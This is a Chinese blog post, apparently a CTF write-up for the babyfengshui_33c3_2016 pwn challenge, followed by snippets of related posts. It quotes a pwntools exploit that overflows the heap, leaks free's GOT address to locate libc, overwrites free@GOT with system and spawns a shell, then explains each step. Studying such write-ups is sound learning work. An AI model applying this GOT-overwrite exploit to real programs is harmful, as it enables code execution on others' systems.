从babyfengshui_33c3_2016中提升抽象能力

已于 2022-07-01 17:30:56 修改
阅读量160 收藏
点赞数
分类专栏: 文章标签: linux pwn
于 2022-07-01 17:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/125562534
版权

直接分析WP:

Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/sh\x00')
Del(0)

#注意堆块块首的长度
Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = u32(p.recv(4))

libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')

#堆块1的description指针已经被修改为free的地址,则可以将free地址内的内容替换为system
Upd(1, 0x4, p32(sys_addr))
Del(2)

p.interactive()

来自这位师傅

首先这个输入检查机制不必多说,绕过检查机制,导致堆溢出是本题的关键。

接下来我们来关注两个重点的问题,,,就是 “往某个地址写东西“” ,这句话的利用:

在这里插入图片描述

Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)

这其实就是在修改description处的用户数据区的值,原本要显示的第二个堆中存着的堆地址被改变。
导致直接去显示了got表中free函数的函数地址,这里比较巧,elf.got[,]和图中那个sub_80486bb的第一个地址一样,都是可以被写的地址。

Upd(1, 0x4, p32(sys_addr))
Del(2)

再来看这个,利用之前传入的free.got表的地址,再利用该函数往该地址写入数据的功能,导致本来是要向原本存储的第一个堆块的地址处写数据改为向free.got表处写数据,直接导致free.got表处的free函数的地址被修改,,,,而后执行system(“/bin/sh\x00”)

在这里插入图片描述
有一点比较离谱的是,这里free的参数是个"/bin/sh\x00"该字符串的地址

babyfengshui 堆溢出简单利用
qq_42728977的博客
04-04 276
题目:babyfengshui 难度:** 漏洞利用:堆溢出 环境:ubuntu16.04 pwntools LibcSearcher 参考链接:传送1 利用思路: 这道题之前做过。最近刷题老刷栈溢出,感觉很没意思,就找了堆的题练练手,不然没什么进步。 菜单题。 一个个选项分析,发现再update里面有问题 这句话就是说,length+&description不能超过结构体struct...
babyfengshui(xctf)
weixin_43868725的博客
08-21 240
0x0 程序保护和流程 保护: 流程: main() add_user() 连续分配了两个堆块,并将第一次分配的堆块的指针存入第二次分配的堆块的fd字段,bk字段开始存放name,之后调用了update_user() 输入完length之后要经过判断,需要第一次分配的堆块的数据段的地址加上输入的长度的值必须小于第二次分配的堆块的数据段的地址减4的值才能输入text。 delete_user() 根据索引分别释放两个堆块,再将指向第二次分配堆块的指针清零。 display_user() 根据索引输
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1781
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
攻防世界PWNBabyfengshui题解
seaaseesa的博客
11-06 1098
本题,首先,为了方便调试,我们需要解决alarm clock问题 程序运行几十秒后就会自动退出,所以,为了方便调试,我们需要先修改一下这个二进制 我们用十六进制编辑器把这几个指令nop(0x90)掉即可 然后,我们就开始做题了 查看创建功能的函数 这里创建了两个堆,第一个堆用来存储description,第二个堆用来存储第一个堆的指针以及name字符串 其数据...
攻防世界babyfengshui解题思路
aptx4869_li的博客
02-02 314
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/babyfengshui$ readelf -h babyfengshui ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, litt
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 900
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 497
buu日常一题
babyfengshui__BUUCTF
Jc
09-29 629
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
[XCTF-pwn] 27_babyfengshui
weixin_52640415的博客
03-09 391
输入长度判断错误。可写溢出。 数据结构: 管理块0x80: char *data_ptr; name[0x7c] 先写数据块再写管理块 unsigned int __cdecl read_text(unsigned __int8 a1) { char v2; // [esp+17h] [ebp-11h] BYREF int v3; // [esp+18h] [ebp-10h] BYREF unsigned int v4; // [esp+1Ch] [e...
一道简单的入门pwn
m1785717的博客
09-07 9909
这是一道入门的pwn题 链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy 拿到题先用file命令查看一下文件信息 可以看到是32-bit 的elf文件,用32位的IDA打开。 首先进入main函数,F5反编译后分析代码 定位到输入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system...
多校B题Baby Bites
weixin_43331783的博客
03-13 227
简单模拟读懂题就好了 一开始忘记转换多位数了wa了一下 #include<iostream> #include<stdio.h> #include<cstring> using namespace std; char a[10]; int change(char a[]) { int n=strlen(a); int ret=0;for(int ...
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 378
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
babyfengshui_33c3_2016题解
coco的博客
12-09 957
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1360
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
Linux 中,目录权限,mkdir -m 选项,用法
jie18894575860的博客
05-28 225
Linux 中,mkdir -m 选项用于在创建目录时直接指定权限模式(无需依赖默认的 umask)。默认权限:若省略 -m,目录权限由 umask 决定(通常 777 -umask)。执行权限(x):目录需要执行权限才能进入(cd)或访问其内容。安全建议:避免随意使用 777,可能引发安全风险。第三位:其他用户(Others)权限。第一位:所有者(Owner)权限。第二位:所属组(Group)权限。八进制 符号表示 权限说明。使用 u(所有者)、
linux】umask权限掩码
2201_75772333的博客
05-25 1183
介绍了Linux文件权限系统及umask接口的作用
零基础开始的网工之路第十四天------Linux程序管理
aigoushan的博客
05-27 523
是运行着的程序,是操作系统执行的基本单位,是程序运行的过程, 是动态的,是有生命周期及运行状态的。安装 : apr-util-bdb-1.6.1-9.el8.x86_64 2/9。安装 : apr-util-openssl-1.6.1-9.el8.x86_64 3/9。验证 : apr-util-bdb-1.6.1-9.el8.x86_64 3/9。
Linux | Shell脚本的基础知识
最新发布
2302_81507127的博客
05-29 370
执行一条命令完毕后,系统会给出一个退出值,若成功则为0,出现错误则1~255退出状态码是一个整数,其有效范围为0~255行为良好的UNIX命令,程序和工具都会返回0作为退出码来表示成功。
linux如何查看网络设备类型
小诸葛的博客
05-27 497
参数会显示设备的详细信息,包括类型。例如,输出中可能包含。运行该命令后,查看输出中网络设备的名称和类型。文件不存在,可能是非 TUN/TAP 设备。Linux 系统中网络设备的信息存储在。是具体的网络接口名(如。输出会显示驱动信息。
Android FahrPlan应用33C3更新历史回顾
33C3指的是2016年的第33届Chaos Communication Congress,这是一个由Chaos Computer Club组织的年会。Chaos Communication Congress是一个主要聚焦于计算机安全、隐私和匿名性话题的技术大会。 2. FahrPlan应用介绍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值